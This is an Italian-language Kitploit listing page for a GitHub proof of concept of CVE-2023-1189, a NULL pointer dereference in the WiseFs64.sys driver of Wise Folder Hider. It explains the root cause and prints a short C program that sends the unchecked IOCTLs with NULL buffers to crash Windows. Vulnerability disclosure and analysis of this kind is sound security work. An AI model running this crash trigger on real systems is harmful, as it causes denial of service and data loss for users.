Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-1189 — CVE-2023-1189 PoC & Exploit | Kitploit
Strumenti/GitHubGitHub/le0s1mba/cve-2023-1189
Analisi delle VulnerabilitàExploitBinary Exploitation
GitHuble0s1mba/cve-2023-1189

CVE-2023-1189

CVE-2023-1189 PoC & Exploit

Vedi Repository
8 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-1189

1. Panoramica

CampoDettagli
CVE IDCVE-2023-1189
Tipo di vulnerabilitàImproper Resource Shutdown or Release (CWE-404)
Software interessatoWiseCleaner Wise Folder Hider
Componente vulnerabileWiseFs64.sys (Kernel Driver)
Versione vulnerabile4.4.3.202
CVSSNVD - 5.5(Medium), VulDB - 3.3(Low)
Data di divulgazione2023.03.06

Questa vulnerabilità consente a un attaccante, con permessi utente, di innescare una NULL Pointer Dereference a livello di kernel tramite specifici IOCTL, portando il sistema in stato BSOD. Si tratta di una vulnerabilità di Local Denial of Service.

2. Causa principale

La vulnerabilità CVE-2023-1189 si verifica nel driver kernel WiseFs64.sys creato durante l'installazione del programma Wise Folder Hider versione 4.4.3.202.

Il flusso complessivo della vulnerabilità è il seguente.

image.png

Osservando il flusso in dettaglio:

DriverEntry func

In primo luogo, nella funzione DriverEntry, il dispatcher dispatchDeviceControl viene impostato all'indice 14 della Dispatch Table.

In questo modo tutti gli IOCTL in arrivo su \\.\WiseFs vengono instradati verso dispatchDeviceControl.

dispatchDeviceControl func

Una volta entrati nella funzione dispatchDeviceControl, viene innanzitutto verificato se si tratta del dispositivo di controllo; in tal caso, si passa alla funzione handleControlDeviceIoctl.

handleControlDeviceIoctl func

La funzione handleControlDeviceIoctl contiene la logica che gestisce i veri codici IOCTL.

Tra i vari codici IOCTL, per 0x222400, 0x222404 e 0x222410 manca la verifica che il valore del Buffer sia NULL o meno.

Pertanto, se questi IOCTL vengono invocati con Buffer NULL, il driver accede al Buffer causando una NULL Pointer Dereference che porta a un BSOD.

3. PoC ed Exploit

root@kitploit:~
#include <stdio.h>
#include <Windows.h>
#include <winioctl.h>

#define SymLinkName L"\\\\.\\WiseFS"

HANDLE hDevice;

int main(int argc, char* argv[]) {
	DWORD dwWrite = 0;

	hDevice = CreateFileW(SymLinkName, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
	if (hDevice == INVALID_HANDLE_VALUE) {
		printf("failed to CreateFile\n");
		return 1;
	}

	// case 0x222400
	// DeviceIoControl(hDevice, 0x222400, NULL, 0, NULL, 0, &dwWrite, NULL);

	// case 0x222404
	// DeviceIoControl(hDevice, 0x222404, NULL, 0, NULL, 0, &dwWrite, NULL);

	// case 0x222410
	// DeviceIoControl(hDevice, 0x222410, NULL, 0, NULL, 0, &dwWrite, NULL);
	
    CloseHandle(hDevice);
    return 0;
}

4. Riferimenti

  • https://nvd.nist.gov/vuln/detail/CVE-2023-1189
  • https://www.cve.org/CVERecord?id=CVE-2023-1189
  • https://cwe.mitre.org/data/definitions/404.html
  • https://github.com/zeze-zeze/WindowsKernelVuln/tree/master/CVE-2023-1189
Scarica lo strumento